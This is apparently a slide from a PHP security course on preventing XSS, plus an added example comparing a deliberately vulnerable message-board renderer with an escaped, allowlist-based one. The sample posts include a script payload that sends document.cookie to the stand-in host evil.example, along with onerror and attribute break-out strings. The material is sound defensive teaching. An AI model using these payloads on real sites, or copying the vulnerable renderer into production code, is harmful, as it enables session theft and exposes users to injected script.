Preventing XSS Attacks
8/17
Realistic XSS Example
Safer Message Board
• Filter ALL foreign data: anything that arrives from a request, cookie, header, database row, or third-party feed is untrusted until it has been escaped for the context where it is output
• Let PHP help: htmlspecialchars()/htmlentities() with ENT_QUOTES and an explicit charset ('UTF-8') for output, strip_tags() only as a first pass and never as the whole defence (it leaves attribute-breaking text such as a stray quote intact); utf8_decode() is a charset converter, not a sanitizer, and is deprecated as of PHP 8.2
• Don't try to guess bad tags (a denylist); only allow safe ones (an allowlist) and escape everything else
• The bad guys are very creative; you must be, too!
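The following is an added example for the "Safer Message Board" slide; it is not code from the original deck. It shows the allowlist approach from the bullets above in working PHP: every post body is escaped with htmlspecialchars() first, and a tiny user-facing markup ([b]..[/b], [i]..[/i]) is then translated back into tags, so no raw "<" from the user ever reaches the browser. The $posts array, the [b]/[i] convention, and the helper names e(), render_body() and render_post_safe() are assumptions for illustration. A deliberately vulnerable renderer is kept beside the safe one to show the difference, and one helper shows why strip_tags() on its own is not enough.

```php
<?php
declare(strict_types=1);

// Added example (not the original slide's code). Names and sample data are assumptions.

// Escape a string for an HTML text node or a quoted attribute value.
// ENT_QUOTES also escapes single quotes, so the result is safe inside
// single-quoted attributes; ENT_SUBSTITUTE replaces invalid UTF-8 with U+FFFD
// instead of returning an empty string (which would silently drop the post).
function e(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Allowlist rendering: escape EVERYTHING first, then re-enable only the
// markup we explicitly permit, written by users as [b]..[/b] and [i]..[/i].
// Because no raw "<" survives e(), an attacker cannot smuggle other tags or
// attributes; the worst case is an unbalanced <b>, which the browser tolerates.
function render_body(string $s): string
{
    $safe = e($s);
    return preg_replace('~\[(/?)(b|i)\]~', '<$1$2>', $safe);
}

// Vulnerable renderer, kept only for contrast: user data is echoed raw.
function render_post_vulnerable(array $post): string
{
    return '<div class="post" data-user="' . $post['user'] . '"><b>'
        . $post['user'] . '</b>: ' . $post['body'] . '</div>';
}

// Safe renderer: every foreign value is escaped for the context it lands in
// (attribute value, text node), and the body goes through the allowlist.
function render_post_safe(array $post): string
{
    return '<div class="post" data-user="' . e($post['user']) . '"><b>'
        . e($post['user']) . '</b>: ' . render_body($post['body']) . '</div>';
}

// Why strip_tags() alone is not a defence: it removes tags, but a payload that
// never contains a tag passes straight through. Dropped into an attribute
// context such as data-user="..." it breaks out and adds an event handler.
function strip_tags_is_not_enough(): string
{
    $payload = '" onmouseover="alert(1)';
    $stripped = strip_tags($payload);              // unchanged: there is no tag to strip
    return '<div data-user="' . $stripped . '">'; // attribute context is now injected
}

// Constructed sample posts (assumed input, not from the original slides).
$posts = [
    ['user' => 'alice',   'body' => 'Hello [b]world[/b], this is [i]fine[/i]'],
    ['user' => 'mallory', 'body' => '<script>document.location="http://evil.example/?c="+document.cookie</script>'],
    ['user' => 'mallory', 'body' => '<img src=x onerror="alert(1)">'],
    ['user' => 'mallory"><script>alert(1)</script>', 'body' => '[b]attribute break-out attempt[/b]'],
];

foreach ($posts as $post) {
    echo "VULNERABLE: " . render_post_vulnerable($post) . "\n";
    echo "SAFE:       " . render_post_safe($post) . "\n\n";
}

echo "strip_tags() only: " . strip_tags_is_not_enough() . "\n";
```

Run it with `php safer_board.php` and compare the two lines per post: in the SAFE output every user-supplied "<", ">", '"' and "'" appears as an entity, while [b]/[i] become real tags. The escape function takes the charset explicitly because htmlspecialchars() with the wrong charset can misparse multi-byte input, and the allowlist is applied after escaping rather than before, so there is no window in which unescaped user input is examined for "bad" tags.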